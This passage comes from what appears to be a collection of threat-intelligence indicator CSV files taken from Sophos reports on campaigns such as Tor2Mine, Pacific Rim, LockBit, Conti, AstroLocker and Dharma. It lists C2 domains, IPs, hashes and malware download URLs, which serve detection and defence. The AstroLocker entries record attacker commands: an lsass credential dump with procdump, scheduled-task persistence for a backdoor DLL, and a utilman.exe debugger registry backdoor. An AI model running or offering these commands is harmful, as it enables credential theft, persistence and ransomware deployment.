url,http://vihansoft.ir/favicon.ico, 76 | url,http://vihansoft.ir/host.zip, 77 | url,http://vihansoft.ir/k.exe, 78 | url,http://vihansoft.ir/p.zip, 79 | url,http://vihansoft.ir/pack.zip, 80 | url,http://vihansoft.ir/sys.dll, 81 | url,http://54.36.10.77/linuxservice.tar.gz, 82 | -------------------------------------------------------------------------------- /Miner-Tor2Mine.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Notes 2 | domain,dns.msftncsi.comeu.minerpool.pw,C2 for Tor2Mine 3 | domain,eu.minerpool.pw,C2 for Tor2Mine (miner panel) 4 | domain,asq.d6shiiwz.pw,C2 for Tor2Mine 5 | domain,eu1.ax33y1mph.pw,C2 for Tor2Mine 6 | domain,pa.kl2a48yh.pw,C2 for Tor2Mine 7 | domain,asd.s7610rir.pw,C2 for Tor2Mine 8 | domain,asq.swhw71un.pw,C2 for Tor2Mine 9 | filename,java.exe,Tor2Mine miner variant (java.exe) 10 | filename,kallen.ps1,Mimikatz Powershell 11 | filename,check1.ps1,Persistence / installation script 12 | filename,checking.ps1,Persistence / installation script 13 | filename,del.ps1,competitive miner removal script 14 | ip,107.181.187.132,C2 for Tor2Mine variant 1 15 | ip,83.97.20.83,C2 for Tor2Mine variant 1 16 | ip,185.10.68.123,C2 for Tor2Mine (miner panel) 17 | ip,83.97.20.81,C2 for Tor2Mine 18 | sha256,b3af7ce4b4ee2f0fc8f44a6011cf35817bd82d6fcbb9ff15cb364f075b140e6a,Tor2Mine main dropper script variant 1 19 | sha256,413997e04e573b6035709852d7e82e25f7510ab9744e69eaea9edf17db546cc4,Tor2Mine miner variant (java.exe) 20 | sha256,b78571cdc8e361703fa144b9d1625d9f198bd85725cca70a70fccff6ab04477c,Tor2Mine main dropper script variant 2 21 | sha256,c1fc58d49031e17317613a2c29013253492a8ce63d126f6588f4345be41bc779,v1.exe Tor2Mine script dropper 22 | sha256,bdae90d511ca8b0be15fb05efd6ff4e530c945333ab8b4938c3d5c38143f2d6a,Tor2Mine 64-bit variant miner 23 | sha256,cdb0e63ea62e96836cdb6096b90bf812909cdc323ba3d98ee4561fa067a28030,Tor2Mine script dropper executable 24 | sha256,19fed775072fff292c8905473b7ca8fa072e29ecc8ea54d0373d1988d8f595e3,Tor2Mine del.ps1 25 | sha256,2e215eaa2f75db97677d10feac7b2f0c4b231f2729190d209964be2adddd1acd,Wscript/WMI spreader dropped in nested %TEMP% folders 26 | sha256,2bc17d049db076d9d590dd7fee6d2695e818de8a863a2281c241f2608d0154b2,check.hta Tor2Mine dropper script 27 | url,http://v1.fym5gserobhh.pw/php/func.php,Tor2Mine C2 remote code source 28 | url,http://eu1.minerpool.pw/upd.hta,Tor2Mine C2 remote code source 29 | url,http://asd.s7610rir.pw/win/checking.hta,Tor2Mine C2 remote code source 30 | url,http://107.181.187.132/test/32.exe,Tor2Mine 32-bit variant miner source 31 | url,http://107.181.187.132/del.bat,remote batch script 32 | url,http://res1.myrms.pw/upd.hta,Tor2Mine remote update script source 33 | url,https://qm7gmtaagejolddt.onion.to/check.hta,check.hta Tor2Mine dropper script source 34 | url, http://107.181.187.132/test/64.exe,Tor2Mine 64-bit variant miner source 35 | url,http://asq.d6shiiwz.pw/win/checking.ps1,Persistence / installation script 36 | url,http://83.97.20.81/win/checking.ps1,Persistence / installation script 37 | url,https://pa.kl2a48yh.pw/upd.hta,Persistence / update script 38 | -------------------------------------------------------------------------------- /MoDi-RAT-reflective-injection.csv: -------------------------------------------------------------------------------- 1 | Indicator_Type,Data,Note, 2 | Description,Indicators for MoDi RAT malware reflective loader attack,https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands, 3 | md5,695b21032e1ba37affa4f13d525798f9869ea794,initial VBE, 4 | md5,0449ae73074153195368cfefd910946d540e59ff,dropped VBS, 5 | domain,mondns.myftp.org,C2, 6 | md5,00c8144d988385ad0d44a8871044185fa9bb78e4,Decoder .Net, 7 | md5,17b85597c55e99d09c8ad5cf9631f0f1d5d82d0e,Injector .Net, 8 | md5,a7967f4f66d4f9d3ac7187cab601abdc47e1c6c0,MoDi RAT, 9 | md5,79bcda484419f0adc9648b581b10498c8415d89a,MoDi RAT, 10 | url,http://vanesaescribano.com/services/coaching-personal,Redirect link from spam, 11 | url,http://phix.es/impots-center,secondary 302 redirect link, 12 | ,,, 13 | ,,, 14 | ,,, 15 | ,,, 16 | ,,, 17 | ,,, 18 | ,,, 19 | ,,, 20 | ,,, 21 | ,,, 22 | ,,, 23 | ,,, 24 | ,,, 25 | ,,, 26 | ,,, 27 | ,,, 28 | ,,, 29 | ,,, 30 | ,,, 31 | ,,, 32 | ,,, 33 | ,,, 34 | ,,, 35 | ,,, 36 | ,,, 37 | ,,, 38 | ,,, 39 | -------------------------------------------------------------------------------- /OWASSRF IOCs 2023-03.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Note 2 | Description,https://news.sophos.com/en-us/2023/03/15/observing-owassrf-exploitation/ ‎,Indicators of OWASSRF exploitation Mar-2023 3 | IP,217.79.243[.]148,C2 Server 4 | IP,38.135.122[.]130,C2 Server 5 | url,devoterfo[.]com,C2 Server 6 | file_path,C:\programdata\komar65.dll,malware; numbers apparently randomly generated and assigned 7 | file_path,C:\programdata\add64s.exe,malware 8 | file_path,c:\programdata\addp.dll,malware 9 | file_path,C:\Windows\Temp\sophos_k.exe,attempts to disable Sophos protections 10 | file_path,C:\Windows\Temp\kk65.bat,malicious driver 11 | file_path,C:\Users\Mysql\AppData\Local\Temp\dRVag.sys,malicious driver 12 | IP,179.60.149[.]28,C2 Server 13 | IP,141.98.9[.]4,C2 Server 14 | IP,91.191.209[.]222,C2 Server 15 | IP,104.238.187[.]145,C2 Server 16 | IP,45.77.101[.]240,C2 Server 17 | IP,192.53.123[.]202,C2 Server 18 | IP,206.125.147[.]98,C2 Server 19 | file_path,C:\ProgramData\pta.exe,renamed copy of PuTTy Link 20 | -------------------------------------------------------------------------------- /PJobRAT_IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Notes 2 | Description,IOCs related to PJobRAT campaigns 2022-2024,https://news.sophos.com/en-us/2025/03/27/pjobrat-makes-a-comeback-takes-another-crack-at-chat-apps/ 3 | sha256,0ad9cd56764ef70bdfbd3b2d269020557135f075d63327dbaab1bf0e9d816fb5,org.complexy.hard 4 | sha256,0ebcfbcda27b84b8f0db6d50abb1b0ff7831938913912156d27880704e69f1f2,com.happyho.app 5 | sha256,37c390ff137ac71004223c73b99a9d8eec8ae2e879dee679bda29c09e1b11a37,sa.aangal.lite 6 | sha256,44a05d1e36938c0d6039e0986de91744482d86d641d1d981f3e8a61385fb33a3,net.over.simple 7 | filename,org.complexy.hard ,PJobRAT package 8 | filename,com.happyho.app,PJobRAT package 9 | filename,sa.aangal.lite,PJobRAT package 10 | filename,net.over.simple,PJobRAT package 11 | domain,westvist.myftp.org,C2 server 12 | domain_port,westvist.myftp.org:8181,C2 server 13 | domain_port,westvist.myftp.org:3574,C2 server 14 | url_path,http://westvist.myftp.org:8181/socket.io/?EIO=4&transport=websocket,C2 server 15 | url_path,http://westvist.myftp.org:3574/notification/chat_notification_v2.php,C2 server 16 | url_path,http://westvist.myftp.org:3574/m_chowa_srv/main.php,C2 server 17 | domain,toolkitapi.xyz,Domain hosting PJobRAT 18 | domain,itechcube.xyz,Domain hosting PJobRAT 19 | domain,dependablework.wordpress.com,Domain hosting PJobRAT 20 | domain,lifestylespractice.wordpress.com,Domain hosting PJobRAT 21 | -------------------------------------------------------------------------------- /PUA-QuickCPU_xmr-stak.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IOCs from https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/, 3 | sha256,54a37cc18dae575965f73cc260cedf5b2d4e356ab53070cc3577c6d0bf125211 ,QuickCPU.dat 4 | sha256,4324ba1ca3a4db940dee5de14644e31268df081047b2681b8e33a1f3da7bae9a,QuickCPU.exe (old version) 5 | sha256,3dabd3bf16f5856d504d0ae20d3d3c9c6c74ccee562964292bb4565dda91a0e8,QuickCPU.exe (new version) 6 | sha256,6539bbb8cbf33b050d544283f51ccc52ec040b62e3c706d20bd0fe4e221212e3 ,run.bat (old) 7 | sha256, 3ad9da14e7f7e68e31d6cb6a8cab13e1eb45cb147371edbf0e4ed3e5262b9f51 ,run.bat (new) 8 | -------------------------------------------------------------------------------- /Pacific_Rim_Asnarok_iocs.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes 2 | description,Indicators from Asnarok attack documented in Pacific Rim Report,: https://news.sophos.com/en-us/2024/10/31/pacific-rim-timeline/ 3 | domain,sophosfirewallupdate.com,Observed in Asnarök CVE 2020-12271 Attack (MITRE ATT&CK Tactic: execution) 4 | domain,43.229.55.44,sophosfirewallupdate.com 5 | asn,AS 63888 (DATAWINGLIMITED-AS DATAWING LIMITED),43.229.55.44/sophosfirewallupdate[.]com 6 | filename,install.sh ,Downloaded from sophosfirewallupdate[.]com (MITRE ATT&CK Tactic: Execution) 7 | registrar,"Wild West Domains, LLC",Registrar for sophostraining[.]org Domains 8 | registrar,"GoDaddy.com, LLC",Registrar for 6 Asnarök Domains 9 | domain,filedownloaderservers.com,Asnarök Domains 10 | domain,sophosenterprisecenter.com,Asnarök Domains 11 | domain,sophoswarehouse.com,Asnarök Domains 12 | domain,sophosproductupdate.com,Asnarök Domains 13 | domain,sophostraining.org,Asnarök Domains 14 | domain,ragnarokfromasgard[.]com,Observed in Asnarök CVE 2020-12271 Attack (MITRE ATT&CK Tactic: execution) 15 | asn,AS 60117 ( Host Sailor Ltd ),ragnarokfromasgard[.]com -------------------------------------------------------------------------------- /Pacific_Rim_CVE-2020-15069_IOCs.csv: -------------------------------------------------------------------------------- 1 | indicator,Data,Notes,,,,, 2 | description,Indicators from Bookmark feature attack (CVE-2020-15069) documented in Pacific Rim Attack,: https://news.sophos.com/en-us/2024/10/31/pacific-rim-timeline/,,,,, 3 | md5,8a721d68f181c2274c3bb3f34cb492ed,Hash of Perl web shell (MITRE ATT&CK Tactic: Persistence),,,,, 4 | filename,patch.sh ,"Disables hotfix on devices, running at 5-minute intervals (MITRE ATT&CK Tactic: Impact)",,,,, 5 | filename,IC.sh,Collected and exfiltrated user account data (MITRE ATT&CK Tactic:Exfiltration),,,,, 6 | sha1,9a5ed7a3319e99698cb7f3a4b98ccb1dd19202b8,patch.sh (MITRE ATT&CK Tactic: Impact),,,,, 7 | sha1,be18ca11b18cee2764b25cb61c6e8f1ead9fa1f6,IC.sh ((MITRE ATT&CK Tactic: Exfiltration),,,,, 8 | ip_port,182.16.103.91:90,IP contacted by IC.sh (MITRE ATT&CK Tactic: Exfiltration),,,,, -------------------------------------------------------------------------------- /Pacific_Rim_Covert_Channels_IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes, 2 | description,"Indicators from ""Covert Channels"" (CVE-2022-3236) attacks documented in Pacific Rim Report",: https://news.sophos.com/en-us/2024/10/31/pacific-rim-timeline/, 3 | tool,Chisel,Open-source network tunneling tool built in Go (MITRE ATT&CK Tactic: Command and Control),Command and Control 4 | tool,fscan,Open-source network scanner built in Go (MITRE ATT&CK Tactic: Discovery),Discovery 5 | tool,zscan,Open-source network scanner built in Go (MITRE ATT&CK Tactic: Discovery),Discovery 6 | ip,192.241.152.245,iHEpkSYD process (MITRE ATT&CK Tactic: Command and Control),Command and Control 7 | ip,172.67.163.48,v64 process (MITRE ATT&CK Tactic: Command and Control),Command and Control 8 | ip,104.21.41.84,v1 process (MITRE ATT&CK Tactic: Command and Control),Command and Control 9 | filename,v64,Believed to be C2 (MITRE ATT&CK Tactic: Command and Control),Command and Control 10 | filename,v1,Believed to be C2 (MITRE ATT&CK Tactic: Command and Control),Command and Control 11 | filename,f,Fscan (https://github.com/shadow1ng/fscan) (MITRE ATT&CK Tactic: Discovery),Discovery 12 | filename,c,Chisel (https://github.com/jpillora/chisel) (MITRE ATT&CK Tactic: Command and Control),Command and Control 13 | filename,z,z (https://github.com/zyylhn/zscan) (MITRE ATT&CK Tactic: Discovery),Discovery 14 | filename,iHEpkSYD,Believed to be C2, 15 | filename,sophos-fix.jar,Malicious Jar file (MITRE ATT&CK Tactic: Persistence),Persistence 16 | filename,SophosAgent.jar,Malicious Jar file (MITRE ATT&CK Tactic: Persistence),Persistence 17 | md5,edeabb6b21bbae30491a7f1ad8cf374b,v1 process (MITRE ATT&CK Tactic: Command and Control),Command and Control 18 | md5,89ae36448f1922870f1a09c29f17c775,Fscan (MITRE ATT&CK Tactic: Discovery),Discovery 19 | md5,2c1397f61325d3ab7eee97124ed8dcfa,Chisel (MITRE ATT&CK Tactic: Command and Control),Command and Control 20 | md5,50b42f796774f925d9bb4b05ec50dffb,sophos-fix.jar (MITRE ATT&CK Tactic:Persistence),Persistence 21 | md5,9bd5e3bd9ca3785b82a767c6b02d74e1,SophosAgent.jar r (MITRE ATT&CK Tactic:Persistence),Persistence 22 | md5,c62ab7e7f5e6cbc04244a76d4adeef16,Fscan (MITRE ATT&CK Tactic: Discovery),Discovery 23 | sha1,4bf1211a59638a6510aaa328d5dfef96807426b5,Fscan (MITRE ATT&CK Tactic: Discovery),Discovery 24 | sha1,3b1329e81739b1ea6acbb4ec4dff11f02ff42570,Fscan (MITRE ATT&CK Tactic: Discovery),Discovery 25 | sha1,bc8bbe7786216e648a914809cc971012023861aa,Fscan (MITRE ATT&CK Tactic: Discovery),Discovery 26 | sha1,253d262afbf76c6e89d48c00bfbc94f987d05c41,Fscan (MITRE ATT&CK Tactic: Discovery),Discovery 27 | sha1,2416700a102184f78ccc79c6802ba4c906f0e0ac,Fscan (MITRE ATT&CK Tactic: Discovery), 28 | sha1,8b0118e9b9b8b686592152500c9c066ffe495ea7,Fscan (MITRE ATT&CK Tactic: Discovery),Discovery 29 | sha1,01833e8f02858aa6ebb91136478c4d1031e809dd,Chisel (MITRE ATT&CK Tactic: Command and Control),Command and Control 30 | sha1,a40e9c97e4e49f7e1fec1972a8a3420020d5c985,Zscan (MITRE ATT&CK Tactic: Discovery),Discovery 31 | sha1,1157c3cbe87405459dc6523ea10bac1d553c379e,Chisel (MITRE ATT&CK Tactic: Command and Control),Command and Control 32 | asn,CLOUDFLARENET,ASN of 104.21.41.84 & 172.67.163.48 ((MITRE ATT&CK Tactic: Command and Control),Command and Control 33 | asn,DIGITALOCEAN-ASN,ASN of 192.241.152.245 (MITRE ATT&CK Tactic: Command and Control),Command and Control -------------------------------------------------------------------------------- /Pacific_Rim_Cyberoam_acct_IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes,,,,, 2 | description,Indicators from Cyberoam account creation attack documented in Pacific Rim Report,: https://news.sophos.com/en-us/2024/10/31/pacific-rim-timeline/,,,,, 3 | user_account,cyberadmin,Admin account added via CVE-2020-29574 0-day (MITRE ATT&CK Tactic: Persistence),Persistence,,,, 4 | user_account,cyberoam_managed,Admin account added via CVE-2020-29574 0-day (MITRE ATT&CK Tactic: Persistence),Persistence,,,, 5 | user_account,cybersupport,Admin account added via CVE-2020-29574 0-day (MITRE ATT&CK Tactic: Persistence),Persistence,,,, -------------------------------------------------------------------------------- /Pacific_Rim_Defending_Forward_IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes,,,,, 2 | description,Indicators from defemding forward investigations documented in Pacific Rim Report,: https://news.sophos.com/en-us/2024/10/31/pacific-rim-timeline/,,,,, 3 | filename,hijack-x86,File present in /tmp directory,,,,, 4 | filename,rt0510-x86,File present in /tmp directory (MITRE ATT&CK Tactic: Command and Control),,,,, 5 | tool,Suterusu,Open source LKM Linux rootkit (MITRE ATT&CK Tactic: Defense Evasion),,,,, 6 | ip_port,59.188.69.231:4438,Connections observed via UDP from rt0510-x86 binary (MITRE ATT&CK Tactic: Command and Control),,,,, 7 | ip_port,59.188.69.231:4439,Connections observed via UDP from rt0510-x86 binary (MITRE ATT&CK Tactic: Command and Control),,,,, 8 | asn,AS 17444 (HKBN Enterprise Solutions Limited),59.188.69.231 (MITRE ATT&CK Tactic: Command and Control),,,,, 9 | filename,libxselinux.so,Detected as Linux/Winnti-T (MITRE ATT&CK Tactic: Defense Evasion),,,,, 10 | sha1,62b690d29808f701b7e30291734a66d78c9cff39,libxselinux.so (MITRE ATT&CK Tactic: Defense Evasion),,,,, -------------------------------------------------------------------------------- /Pacific_Rim_Personal_Panda_IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes,,,, 2 | description,Indicators from Personal Panda attack documented in Pacific Rim Report,: https://news.sophos.com/en-us/2024/10/31/pacific-rim-timeline/,,,, 3 | filename,libsophos.so ,Userland rootkit which injected into SSH daemon via LD_PRELOAD env variable (MITRE ATT&CK Tactic: Defense Evasion),,,, 4 | md5,c71cd27efcdb8c44ab8c29d51f033a22,libsophos.so (MITRE ATT&CK Tactic: Defense Evasion),,,, 5 | filename,libgoat.so,Renamed libsophos.so observed on attacker's development machine (MITRE ATT&CK Tactic: Defense Evasion),,,, 6 | sha1,dc64bbdcb4ce0c2c49bb681de35f181f096dee30,Gh0stRat (MITRE ATT&CK Tactic: Defense Evasion),,,, 7 | ip,192.248.152.58,"Seen in Volexity DriftingCloud article, used to download Python script to exploit CVE-2021-4034 (MITRE ATT&CK Tactic: Execution)",,,, 8 | asn,AS 20473 ( AS-CHOOPA ),ASN of 192.248.152.58 ((MITRE ATT&CK Tactic: Execution),,,, 9 | filename,libiculxg.so ,Sliver C2 framework implant ((MITRE ATT&CK Tactic: Execution),,,, 10 | sha1,7b1e16548265fe4ef9e882af7f1fdf336d072b5a,libiculxg.so (MITRE ATT&CK Tactic: Execution),,,, 11 | -------------------------------------------------------------------------------- /Pacific_Rim_Under_The_Radar_IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes 2 | description,"Indicators from ""Under the Radar"" attacks documented in Pacific Rim Report",: https://news.sophos.com/en-us/2024/10/31/pacific-rim-timeline/ 3 | filename,XG210-rkloadtest.bin,UEFI BIOS bootkit based on VectorEDK (MITRE ATT&CK Tactic: Defense Evasion) 4 | tool,LCX,Open-source port mapping tool 5 | tool,Microsocks,Open source SOCKS5 proxy tool built in C (MITRE ATT&CK Tactic: Command and Control) 6 | md5,713F088F02B060F6BBED3C243780E808,ELF Backdoor (MITRE ATT&CK Tactic: Defense Evasion) 7 | sha1,74b0fbbb8cb42609eab31d7abcb05515a271e721,File obfuscated with go-strip (MITRE ATT&CK Tactic: Command and Control) 8 | tool,sdb,Netcat clone with enhanced feature set (encrypted comms) (MITRE ATT&CK Tactic: Execution) 9 | tool,PLTHook,Open-source tool to hook function calls by replacying PLT enteries 10 | tool,FRP,Open-source reverse proxy built in Go (MITRE ATT&CK Tactic: Command and Control) 11 | sha1,56e233cebc7f83b48b5cfc947bbbf8f274677305,nasm binary (MITRE ATT&CK Tactic: Persistence) 12 | sha1,65fc7268778ff81d93b4f368bdb19899ce834998,sdb hash (MITRE ATT&CK Tactic: Command and Control) -------------------------------------------------------------------------------- /Ransom-Lockbit_20220412.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs related to Lockbit ransomware attacks,https://news.sophos.com/en-us/2022/04/12/attackers-linger-on-government-agency-computers-before-deploying-lockbit-ransomware/ 3 | sha256,6684e1df360db67719f65bcd39467cc88bbd7bb910636d03071245b622e7cfa3,Advanced Port Scanner 4 | sha256,87bfb05057f215659cc801750118900145f8a22fa93ac4c6e1bfd81aa98b0a55,Advanced Port Scanner 5 | sha256,4a9dde3979c2343c024c6eeeddff7639be301826dd637c006074e04a1e4e9fe7,Anydesk 6 | sha256,db385ea6858db4b4cb49897df9ec6d5cc4675aaf675e692466b3b50218e0eeca,"Mimikatz (ATK/Mimikatz-AE) 7 | " 8 | sha256,3d0e06086768500a2bf680ffbed0409d24b355887169b821d55233529ad2c62a,Mimikatz mimispool.dll/mimilib.dll (ATK/Mimikatz-BE) 9 | sha256,0d31a6d35d6b320f815c6ba327ccb8946d4d7f771e0dcdbf5aa8af775576f2d1,Mimikatz mimilove.exe (ATK/Mimikatz-BE) 10 | sha256,83d7f6eaf7fe075503ea6a0bc726633c34595a6eae7edd7deab95ab4d4a66fd5,NLBrute (Mal/VMProtBad-A) 11 | sha256,46367bfcf4b150da573a74d91aa2f7caf7a0789741bc65878a028e91ffbf5e42,Process Hacker 12 | sha256,89904c4d3b1ebbdfd294b1a87940400a2db2ead01b3d6e3e2e151481faae95bd,ScreenConnect 13 | sha256,ffbb5241ed488b98725013185c80f40156d32884a87d6898d53e2aef28f1c3f8,ScreenConnect 14 | url,rdpguard[.]com/download.aspx, 15 | url,hXXps://cryptobrowser.site/, 16 | url,hXXps://hanner-blobal[.]com, 17 | url,hXXps://aapu.xyz, 18 | url,hXXps://rinryesop.one, 19 | -------------------------------------------------------------------------------- /Ransomware-AstroLocker.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs related to Astro Locker ransomware,https://news.sophos.com/en-us/2021/03/31/sophos-mtr-in-real-time-what-is-astro-locker-team/ 3 | command,C:\Windows\SysWow64\NOTEPAD.EXE C:\Windows\locker_64.dll.log , 4 | command,makecab lsass.dmp lsass.dmp.cab , 5 | command,procdump64.exe  -accepteula -ma lsass.exe lsass.dmp , 6 | command,"rundll32.exe  locker_64.dll,DllRegisterServer /SCAN:L ", 7 | command,"rundll32.exe  locker_64.dll,DllRegisterServer ", 8 | command,"schtasks  /Create /RU \ /SC DAILY /ST 03:42 /TN ""updater"" /TR ""regsvr32.exe /i C:\Users\\AppData\wininit64.dll"" /F ", 9 | command,taskhost.exe regsvr32.exe /i C:\Users\\AppData\wininit64.dll , 10 | domain,139.60.161.68 ,Cobalt Strike 11 | domain,185.38.185.87,IcedID 12 | domain,45.134.21.8,Cobalt Strike 13 | domain,46.21.153.135,Cobalt Strike 14 | domain,albanallahacrab.club,IcedID 15 | domain,dclogictrust.com ,Cobalt Strike 16 | domain,masskwearing.cyou,IcedID 17 | domain,padishahmurrka.best,IcedID 18 | domain,uragusexgre.club,IcedID 19 | filename,locker_64.dll,Mount Locker ransomware 20 | filename,RecoveryManual.html ,Ransom note 21 | filename,wininit64.dll,RDP backdoor 22 | service,%COMSPEC% /C echo copy c:\\wininit64.dll c:\\Users\\\\appdata ^> %SYSTEMDRIVE%\\WINDOWS\\Temp\\jEmLSzCoDrwddqjU.txt > \\WINDOWS\\Temp\\LtWMjPKPlFsUiCKD.bat & %COMSPEC% /C start %COMSPEC% /C \\WINDOWS\\Temp\\LtWMjPKPlFsUiCKD.bat,Named with random 16-digit string 23 | service,%COMSPEC% /C echo REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe /f /v Debugger /t REG_SZ /d %windir%\\system32\\cmd.exe ^> %SYSTEMDRIVE%\\WINDOWS\\Temp\\DDEjIHhcFicEzhmu.txt > \\WINDOWS\\Temp\\mchdhcdhpdBvOxXF.bat & %COMSPEC% /C start %COMSPEC% /C \\WINDOWS\\Temp\\mchdhcdhpdBvOxXF.bat,Named with random 16-digit string 24 | service,%COMSPEC% /C echo dir c:\\ ^> %SYSTEMDRIVE%\\WINDOWS\\Temp\\xJqUhSaZPqxAjHzn.txt > \\WINDOWS\\Temp\\mOWsUypRQFwlZMkF.bat & %COMSPEC% /C start %COMSPEC% /C,Named with random 16-digit string 25 | service,%COMSPEC% /C echo whoami ^> %SYSTEMDRIVE%\\WINDOWS\\Temp\\FaUocMGJjmCAbJMr.txt > \\WINDOWS\\Temp\\uxvbnnSkrkOMnsJg.bat & %COMSPEC% /C start %COMSPEC% /C,Named with random 16-digit string 26 | sha256,0a671d9d7ca62274e5e210813d02d860846baf59188e2a07522cd3a1cc3f9cc0 ,RDP backdoor 27 | sha256,2c44444d207a78da7477ae1af195d4265134e895bebb476f7b2c003f1467a033 ,Mount Locker ransomware DLL 28 | scheduled task,regsvr32.exe /i C:\Users\\AppData\wininit64.dll,Name: updater  29 | scheduled task,regsvr32.exe /i C:\Program Files\Google\Drive\wininit64.dll,Name: updater  30 | scheduled task,regsvr32.exe /i C:\AMD\WU-CCC2\ccc2_install\wininit64.dll,Name: regsvr32 31 | -------------------------------------------------------------------------------- /Ransomware-BlackByte.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IOCs related to BlackByte ransomware,https://news.sophos.com/en-us/2022/10/04/blackbyte-ransomware-returns/ 3 | sha256,01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd,RTCore64.sys driver 4 | sha256,9103194d32a15ea9e8ede1c81960a5ba5d21213de55df52a6dac409f2e58bcfe,BlackByte v2 packed sample 5 | -------------------------------------------------------------------------------- /Ransomware-Conti.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs from the Conti ransomware report,https://news.sophos.com/en-us/2021/02/16/conti-ransomware-evasive-by-nature/ 3 | domain,docns.com,Cobalt Strike C2 4 | domain,tapavi.com,Cobalt Strike C2 5 | domain,contirecovery.best, 6 | url_path,/Menus.aspx,Used by Cobalt Strike component. Source: https://github.com/xx0hcd/Malleable-C2-Profiles/blob/master/normal/trevor.profile 7 | url_path,/menus.aspx,Used by Cobalt Strike component. Source: https://github.com/xx0hcd/Malleable-C2-Profiles/blob/master/normal/trevor.profile 8 | url_path,/us/ky/louisville/312-s-fourth-st.html,Used by Cobalt Strike component. Source: https://github.com/xx0hcd/Malleable-C2-Profiles/blob/master/normal/trevor.profile 9 | ip,23.106.160.174,resolved docns.com 10 | ip,23.82.140.137,resolved tapavi.com 11 | sha256,3b375dcda1f6019d986de1f7ae3458657e623c4f401c121e660add55d36a9e8c,backup.dll (Cobalt Strike component) 12 | sha256,4e3d8806e6c9ba334166f12ffe4e27dbde203425c882fccf1e452f77355b7d25,backup.dll (Cobalt Strike component) 13 | sha256,e974c09f204b99bfcdeb9fe4a561a28e064c612132829919f8b99a838c2b2106,backup.dll (Cobalt Strike component) 14 | sha256,af218e34e12216d56e5c6c86704804866100aa09ccb9160bc4029492c3f1f959,x64.dll (Cobalt Strike component) 15 | sha256,591677b54eb556e7e840670eccb2d62434e336af6d3908394d17cb26e99c4733,s1.dll (Cobalt Strike component) 16 | MD5,C7BCB3B84244A22E6EE9699CFBD86DC9F27FC677,doc.dll (Cobalt Strike component) 17 | sha256,2d3b859f2ad3f0e296fd29c1abc5eb80b4dabe7c0b9d9a3b44821c9ed8e015b1,aa64.dll (Cobalt Strike component) 18 | sha256,63625702e63e333f235b5025078cea1545f29b1ad42b1e46031911321779b6be,conti.exe (ransomware payload) 19 | -------------------------------------------------------------------------------- /Ransomware-Dharma-RaaS.csv: -------------------------------------------------------------------------------- 1 | Indicator_Type,Data,Note, 2 | Description,Indicators from Dharma RaaS attacks,, 3 | file_path_name,\\tsclient\e,Network mounted drive for Dharma RaaS attacks via RDP, 4 | file_path_name,\\tsclient\e\ps\,Powershell directory for Dharma RDP RaaS attack, 5 | file_path_name,\\tsclient\e\torqNet\,Tor tools for Dharma RDP RaaS attack, 6 | file_path_name,\\tsclient\e\ms16\,, 7 | file_path_name,\\tsclient\e\mimikatz_trunk\x64,64-bit Mimikatz files for Dharma RDP RaaS, 8 | file_path_name,\\tsclient\e\mimikatz_trunk\Win32,32-bit Mimikatz files for Dharma RDP RaaS, 9 | file_path_name,\\tsclient\e\Password Viewers\,Password viewers for Dharma RDP RaaS, 10 | file_path_name,\\tsclient\e\rdpv,RDP Password Viewer files for Dharma RDP RaaS, 11 | file_path_name,\\tsclient\e\Lazagne,LaZagne password scraper files for Dharma RDP RaaS, 12 | file_path_name,\\tsclient\e\Hash_Suite_Free\Tools,Hash Suite Free files for Dharma RDP RaaS, 13 | file_path_name,\\tsclient\e\1SafeMode,, 14 | file_path_name,\\tsclient\e\SafeCrypt\,, 15 | file_path_name,\\tsclient\e\PCHunter\,, 16 | file_path_name,\\tsclient\e\exe\,, 17 | file_path_name,\\tsclient\e\RegistryFinder\,, 18 | file_path_name,\\tsclient\e\x\,, 19 | file_path_name,\\tsclient\e\torqNet\,, 20 | file_path_name,\\tsclient\e\AdvancedIPScanner\,, 21 | file_path_name,\\tsclient\e\WmiDomain\,, 22 | file_path_name,\\tsclient\e\2fin\,, 23 | file_path_name,\\tsclient\e\bat\,, 24 | file_path_name,\\tsclient\e\2018\,, 25 | file_path_name,\\tsclient\e\mimiNLbrute\,, 26 | file_path_name,\\tsclient\e\miadnlrdp\,, 27 | sha1,1bfb9bf7a00b8b6e9a0a7eb8fcf9c69738562d3f,Initial Dharma RaaS compromise script, 28 | file_name,toolbelt.ps1,Main attack script, 29 | file_name,elevate.ps1,Privelege escalation script, 30 | file_name,LApass.ps1,Dharma user changer script, 31 | file_name,lubrute.ps1,Dharma local user brute force attack, 32 | file_name,Find-Pass.ps1,, 33 | file_name,Delete-AVServices.ps1,PowerShell kills services and runs uninstall on AV services, 34 | file_name,appWiz.ps1,Dharma script to automate application removal wizard, 35 | file_name,Disable-WinDefend.ps1,Dharma script to disable Windows Defender, 36 | file_name,purgeMemory.ps1,Shadow copy deletion and other tasks associated with Dharma execution, 37 | file_name,winhostok.ps1,, 38 | file_name,NetPC.ps1,Dharma script to harvest PC names from network, 39 | file_name,NetSubPC.ps1,Dharma script to harvest PC names from subnets on local network, 40 | file_name,NetADPC.ps1,Dharma script to harvest PC names from Active Directory, 41 | file_name,GetHosts.ps1,Dharma script to use WMI to find hostnames, 42 | file_name,adbrute.ps1,Dharma Active Directory account brute force script, 43 | file_name,2sys.ps1,, 44 | file_name,wallet.ps1,, 45 | 